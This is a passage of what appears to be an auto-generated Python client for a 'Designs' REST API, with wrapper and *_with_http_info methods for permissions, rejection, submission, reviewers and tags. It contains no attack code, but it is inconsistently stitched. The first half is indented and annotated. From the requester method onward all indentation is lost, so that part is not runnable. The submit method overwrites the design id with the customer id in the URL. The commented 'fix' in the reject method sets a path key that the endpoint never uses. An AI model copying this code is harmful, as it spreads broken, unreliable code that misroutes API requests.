    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_post`")
    collection_formats = {}
    resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body: the DesignPermissionSet to create.
    body_params = None
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the POST request; returns the deserialized DesignPermissionSet
    # (or the request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignPermissionSet',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_permission_put(self, id, **kwargs):
    """
    Update permission of this model.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_put(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignPermissionSet data:
    :return: DesignPermissionSet
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_permission_put_with_http_info(id, **kwargs)
def designs_id_permission_put_with_http_info(self, id, **kwargs):
    """
    Update permission of this model.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_put_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignPermissionSet data:
    :return: DesignPermissionSet
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_permission_put" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_put`")
    collection_formats = {}
    resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body: the replacement DesignPermissionSet.
    body_params = None
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the PUT request; returns the deserialized DesignPermissionSet
    # (or the request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignPermissionSet',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_portal_get(self, id, **kwargs):
    """
    Fetches belongsTo relation portal.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_portal_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: Portal
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_portal_get_with_http_info(id, **kwargs)
def designs_id_portal_get_with_http_info(self, id, **kwargs):
    """
    Fetches belongsTo relation portal.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_portal_get_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: Portal
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'refresh']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_portal_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_portal_get`")
    collection_formats = {}
    resource_path = '/Designs/{id}/portal'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    # Optional 'refresh' flag is passed through as a query parameter.
    if 'refresh' in params:
        query_params['refresh'] = params['refresh']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the GET request; returns the deserialized Portal (or the
    # request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Portal',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_put(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_put(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param Design data: Model instance data
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_put_with_http_info(id, **kwargs)
def designs_id_put_with_http_info(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_put_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param Design data: Model instance data
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_put" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_put`")
    collection_formats = {}
    resource_path = '/Designs/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body: the full replacement Design instance.
    body_params = None
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the PUT request; returns the deserialized Design (or the
    # request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_reject_post(self, id, id2, **kwargs):
    """
    Reject design

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_reject_post(id, id2, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str id2: Customer id (required)
    :param Design data:
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_reject_post_with_http_info(id, id2, **kwargs)
def designs_id_reject_post_with_http_info(self, id, id2, **kwargs):
    """
    Reject design
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_reject_post_with_http_info(id, id2, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str id2: Customer id (required)
    :param Design data:
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'id2', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'id2', 'kwargs'); validated kwargs
    # are merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_reject_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_reject_post`")
    # verify the required parameter 'id2' is set
    if ('id2' not in params) or (params['id2'] is None):
        raise ValueError("Missing the required parameter `id2` when calling `designs_id_reject_post`")
    collection_formats = {}
    resource_path = '/Designs/{id}/reject'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'id2' in params:
        # FIX: this previously assigned to path_params['id'], clobbering the
        # design id with the customer id in the request URL.  Store the
        # customer id under its own key (matching the id/fk pattern used by
        # the other two-parameter endpoints in this class).
        path_params['id2'] = params['id2']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body.
    body_params = None
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the POST request; returns the deserialized Design (or the
    # request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_rejection_comment_get(self, id, **kwargs):
    """
    Fetches belongsTo relation rejectionComment.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_rejection_comment_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: DesignComment
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_rejection_comment_get_with_http_info(id, **kwargs)
def designs_id_rejection_comment_get_with_http_info(self, id, **kwargs):
    """
    Fetches belongsTo relation rejectionComment.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_rejection_comment_get_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: DesignComment
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'refresh']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_rejection_comment_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_rejection_comment_get`")
    collection_formats = {}
    resource_path = '/Designs/{id}/rejectionComment'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    # Optional 'refresh' flag is passed through as a query parameter.
    if 'refresh' in params:
        query_params['refresh'] = params['refresh']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the GET request; returns the deserialized DesignComment (or
    # the request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_replace_post(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_replace_post(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param Design data: Model instance data
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_replace_post_with_http_info(id, **kwargs)
def designs_id_replace_post_with_http_info(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_replace_post_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param Design data: Model instance data
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_replace_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_replace_post`")
    collection_formats = {}
    resource_path = '/Designs/{id}/replace'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body: the full replacement Design instance.
    body_params = None
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the POST request; returns the deserialized Design (or the
    # request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_requester_get(self, id, **kwargs):
"""
Fetches belongsTo relation requester.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_requester_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_requester_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_requester_get_with_http_info(id, **kwargs)
return data
def designs_id_requester_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation requester.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_requester_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_requester_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_requester_get`")
collection_formats = {}
resource_path = '/Designs/{id}/requester'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_reviewer_get(self, id, **kwargs):
"""
Fetches belongsTo relation reviewer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_reviewer_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_reviewer_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_reviewer_get_with_http_info(id, **kwargs)
return data
def designs_id_reviewer_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation reviewer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_reviewer_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_reviewer_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_reviewer_get`")
collection_formats = {}
resource_path = '/Designs/{id}/reviewer'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_submit_post(self, id, id2, **kwargs):
"""
Submit design for approval
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_submit_post(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_submit_post_with_http_info(id, id2, **kwargs)
else:
(data) = self.designs_id_submit_post_with_http_info(id, id2, **kwargs)
return data
def designs_id_submit_post_with_http_info(self, id, id2, **kwargs):
"""
Submit design for approval
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_submit_post_with_http_info(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'id2']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_submit_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_submit_post`")
# verify the required parameter 'id2' is set
if ('id2' not in params) or (params['id2'] is None):
raise ValueError("Missing the required parameter `id2` when calling `designs_id_submit_post`")
collection_formats = {}
resource_path = '/Designs/{id}/submit'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'id2' in params:
path_params['id'] = params['id2']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_count_get(self, id, **kwargs):
"""
Counts tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_count_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_count_get_with_http_info(id, **kwargs)
return data
def designs_id_tags_count_get_with_http_info(self, id, **kwargs):
"""
Counts tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_delete(self, id, **kwargs):
"""
Deletes all tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
